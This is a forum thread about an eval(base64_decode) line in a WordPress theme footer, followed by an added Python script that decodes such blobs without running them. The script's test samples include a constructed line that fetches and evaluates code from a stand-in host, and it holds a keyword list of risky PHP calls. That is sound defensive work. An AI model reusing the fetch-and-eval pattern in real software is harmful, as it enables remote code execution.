
Can someone tell my what this is

Discussion in 'General Programming Chat' started by mindmaster, Feb 21, 2011.

  1. mindmaster

    mindmaster Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2010
    Messages:
    2,501
    Likes Received:
    1,135
    Location:
    at my new office
    PHP:
    <?php eval(base64_decode('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'));?>
    What the heck is this in my theme?

    Thanks
     
  2. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    base64 :D
     
  3. CoyoteAssassin

    CoyoteAssassin Elite Member

    Joined:
    Jan 3, 2010
    Messages:
    1,862
    Likes Received:
    3,906
    Occupation:
    Full Time IMer
    Location:
    USA
    According to this site, you have been hacked. What software is it, and did you get it from here?

    Code:
    http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/
    eval(base64_decode hack going around the internet

    If your cart "suddenly" stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
    Some of the more common signs of this are
    * Category images stop displaying
    * FCK editor refuses to display images folder
    * Payment modules stop working
    * Checkout process stops working

    How will you know?
    Open any PHP file on your server, if at the very top you see a line like
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
    Then you have been hacked.

    To clean your site you have two options,
    1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
    And restore from a good back up. This is the best and easy route.

    2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

    This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

    Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

    When this has been done it will be good practice to "drop" your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I've not come across this yet, but have heard it happens.

    Now your site is free on the code, you need to prevent it from happening again.

    How to prevent infection.

    This is not guaranteed 100% proof but it is going to help stop re-infection.

    Change the name of your admin folder to something less obvious.
    Delete admin/filemanager.php and associated links.
    Ensure that your folder permissions are never set higher than 755
    Install some security addons,
    Also some ideas from this post can help you,
    If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
    There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.
     
    • Thanks Thanks x 1
  4. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    Actually you are using a WP theme and most of the footer.php is code...

    here's your footer.php

    <?php
    ?><?php wp_footer(); ?>
    <div class="center-widget-title"></div>
    <div class="center-widget">

    <div class="footer">
    <p>Copyright © <a href="<?php echo get_settings('home'); ?>">
    <?php bloginfo('name'); ?>
    </a></p> <!-- close the link and paragraph the posted version left open -->
    </div> <!-- footer -->
    </div> <!-- Center Widget -->
    </div> <!-- page -->
    </body>
    </html><?php
    ?>
     
    • Thanks Thanks x 1
    Last edited: Feb 21, 2011
  5. inaga

    inaga Newbie

    Joined:
    Feb 4, 2010
    Messages:
    12
    Likes Received:
    3
    eval(); executes script/code, the string is base64 encoded. When decoded it doesn't seem to be anything malicious, and as said before it looks to be the footer of your theme. Just to clarify once more for you.
     
    • Thanks Thanks x 1
  6. mindmaster

    mindmaster Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2010
    Messages:
    2,501
    Likes Received:
    1,135
    Location:
    at my new office
    It is from the footer, but it scared the hell out of me.

    Thankfully this does not appear elsewhere. I opened a few PHP files from my FTP.

    So it is safe, you say.

    Thanks
     
  7. blakamia

    blakamia Junior Member

    Joined:
    Jan 25, 2010
    Messages:
    162
    Likes Received:
    343
    This is a trick in free themes where they insert their link into your footer. That way the theme author gets a link which many people do not notice. It's popular in many high competition niches. Check out top 'auto insurance' (iirc) sites' backlinks sometimes.
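The thread settles the question by hand: paste the base64 string into a decoder (CoyoteAssassin's quoted procedure), read what eval() would have run (inaga's explanation), and notice it is a footer with a vendor credit link (blakamia's point). The script below is an added example of doing that triage without ever executing the blob; it is not code from the thread or from any theme. It scans PHP source for eval(base64_decode('...')) calls, peels nested wrappers of the same form, and reports the decoded text, any hyperlinks in it, and any PHP functions that warrant a manual look. The sample files, the hostnames (theme-vendor.example, c2.example) and the "risky call" list are constructed for the example.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Tuple

# eval(base64_decode('...')) / eval(base64_decode("...")), tolerating the whitespace
# and /**/ padding seen in the infected-file example quoted earlier in the thread.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\r\n]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
HREF_RE = re.compile(r"<a\s[^>]*?href\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
# Constructed triage list: functions whose presence in a decoded blob means "read it by hand".
RISKY_CALL_RE = re.compile(
    r"\b(eval|system|exec|shell_exec|passthru|assert|create_function|"
    r"file_put_contents|fwrite|curl_exec|file_get_contents)\s*\(",
    re.IGNORECASE,
)
MAX_LAYERS = 10  # stop peeling wrappers after this many, whatever the blob claims


@dataclass
class Finding:
    offset: int              # byte offset of the eval(...) call in the scanned file
    layers: int              # how many eval(base64_decode()) wrappers were peeled
    decoded: str             # innermost decoded PHP/HTML text
    links: List[str]         # href targets found in the decoded text
    risky_calls: List[str]   # PHP functions in the decoded text worth a manual look


def decode_layers(b64: str) -> Tuple[str, int]:
    """Base64-decode a blob; if the result is itself eval(base64_decode(...)), keep going.
    This is pure string decoding: nothing here is executed."""
    layers, text, current = 0, "", b64
    while current is not None and layers < MAX_LAYERS:
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", current), validate=True)
        except (binascii.Error, ValueError):
            break  # not valid base64 at this layer; report what we have
        text = raw.decode("utf-8", "replace")
        layers += 1
        inner = EVAL_B64_RE.search(text)
        current = inner.group(1) if inner else None
    return text, layers


def analyze_php_source(src: str) -> List[Finding]:
    """Return one Finding per eval(base64_decode(...)) call found in a PHP file's text."""
    findings = []
    for m in EVAL_B64_RE.finditer(src):
        decoded, layers = decode_layers(m.group(1))
        findings.append(Finding(
            offset=m.start(),
            layers=layers,
            decoded=decoded,
            links=HREF_RE.findall(decoded),
            risky_calls=sorted({c.lower() for c in RISKY_CALL_RE.findall(decoded)}),
        ))
    return findings


def verdict(f: Finding) -> str:
    """One-line summary for an operator: risky code beats links beats nothing."""
    if f.risky_calls:
        return "REVIEW: decoded code calls " + ", ".join(f.risky_calls)
    if f.links:
        return "LINKS: decoded markup contains %d link(s): %s" % (len(f.links), ", ".join(f.links))
    return "BENIGN-LOOKING: no links or risky calls in decoded text"


# --- Constructed sample inputs (not real theme or malware code) ---------------------------
FOOTER_PHP = (
    '<?php wp_footer(); ?>\n'
    '<div class="footer"><p>Copyright <a href="/">Site</a> | '
    'Theme by <a href="http://theme-vendor.example/">Vendor</a></p></div>\n'
    '</body></html>'
)


def _wrap(php: str) -> str:
    """Wrap PHP text the way the thread's theme did: eval(base64_decode('...'));"""
    return "eval(base64_decode('" + base64.b64encode(php.encode()).decode() + "'));"


SAMPLE_FOOTER_FILE = "<?php " + _wrap(FOOTER_PHP) + " ?>\n"                    # one layer
SAMPLE_NESTED_FILE = "<?php /**/" + _wrap("<?php " + _wrap(FOOTER_PHP) + " ?>") + "?>\n"  # two layers
SAMPLE_SUSPICIOUS_FILE = "<?php " + _wrap(
    '<?php /* constructed: not real malware */ '
    'eval(file_get_contents("http://c2.example/payload.txt")); ?>'
) + " ?>\n"

if __name__ == "__main__":
    for name, src in [("footer", SAMPLE_FOOTER_FILE), ("nested", SAMPLE_NESTED_FILE),
                      ("suspicious", SAMPLE_SUSPICIOUS_FILE)]:
        for f in analyze_php_source(src):
            print("%s: offset=%d layers=%d %s" % (name, f.offset, f.layers, verdict(f)))
            print("  decoded:", f.decoded[:80].replace("\n", " "))
```

Run it against real files by reading each .php file's text and passing it to analyze_php_source(); a footer like the one in this thread comes back as LINKS with the vendor URL, which is what the posters concluded, while a blob that decodes to further eval() or file I/O is flagged for manual reading. Because the decoder never runs PHP, it is safe to point at an entire theme directory.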